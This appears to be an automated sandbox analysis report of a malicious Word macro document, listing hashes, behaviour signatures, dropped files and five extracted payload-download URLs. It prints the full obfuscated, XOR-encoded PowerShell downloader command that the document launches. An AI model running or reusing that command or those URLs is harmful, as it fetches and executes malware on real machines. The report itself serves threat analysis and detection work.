Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 13:59
Behavioral task
behavioral1
Sample
5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc
-
Size
109KB
-
MD5
5f73269a632986304114e57d3eb98b53
-
SHA1
fb222d6c7b0f99612d5da76e0e0479b5d196590e
-
SHA256
02c97c7cfa6fa18281256b83b09b0457d667c095c64bdcdab009cefaeed524a5
-
SHA512
98158dbb354ecb5a3d17c298f1d5a1d62ac26d252090a78a17c2c95bb58e63e1cd2746a6a95e79b3b5522a6dde74018d04e58c13b86b94fc7cd2b85082527e6d
-
SSDEEP
1536:3FFFF7dC7MQMXc0qg4F5MnrA+aJks0abqExYBvAy42+Ge:XQ5g4fYXZAyh
Malware Config
Extracted
http://www.copticpope.org/7nCPQr/
http://wevik.hu/oadkCq/
http://jakeingles.com/W3cw/
http://www.kaukabphysiatry.com/hg9g/
http://www.facebook.printuser.nl/dhxj/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
PowersHell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4756 1164 PowersHell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
PowersHell.exeflow pid process 27 4756 PowersHell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1164 WINWORD.EXE 1164 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
PowersHell.exepid process 4756 PowersHell.exe 4756 PowersHell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PowersHell.exedescription pid process Token: SeDebugPrivilege 4756 PowersHell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE 1164 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1164 wrote to memory of 4756 1164 WINWORD.EXE PowersHell.exe PID 1164 wrote to memory of 4756 1164 WINWORD.EXE PowersHell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHell.exePowersHell ('25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T19_94_82T77X73<84!94{77}82T77T88<19{82{79_90E18E10<83_126}109T108X79}18T125X85_73}73{77<7!18{18<74}88}75j84T86}19}85q72X18q82X92!89E86!126E76!18E125{85X73!73T77_7E18E18X87}92q86j88}84}83T90}81_88j78j19E94!82<80j18X106{14q94!74_18}125E85{73T73}77E7!18_18}74E74{74{19q86X92}72{86j92{95!77T85{68<78E84T92X73}79{68E19q94E82<80X18{85_90<4X90{18}125X85!73_73_77X7!18T18{74X74}74!19_91q92_94<88{95!82{82_86{19}77}79!84q83{73j72}78T88{79T19!83{81j18X89T85T69q87_18q26X19q110!77E81j84X73_21T26q125j26q20!6{25<105j114q106<29X0T29j26}4<14T26X6X25<73E85_116j0T25T88T83<75X7}73j88j80{77<22j26}97{26{22q25T105E114X106j22_26_19{88!69j88{26!6!91!82!79{88E92X94_85X21T25_107j79}105T29T84T83T29<25j77j77<100!20{70j73X79_68E70j25}71}91{126}19j121}82j74<83<81T82!92E89{123_84!81E88!21T25j107<79X105_17X29T25E73{85!116<20{6_110!73E92X79j73!16_109E79j82q94T88q78<78}29E25_73!85E116q6{95{79q88j92_86T6{64_94}92q73T94!85T70{64X64'.SplIT('<X!_q{jET}' )| % {[ChAr] ( $_-bxOR 0x3d )}) -jOIN '' | . ( ([StrIng]$VErbosEPRefeReNCE)[1,3]+'x'-joIN'')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4756
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82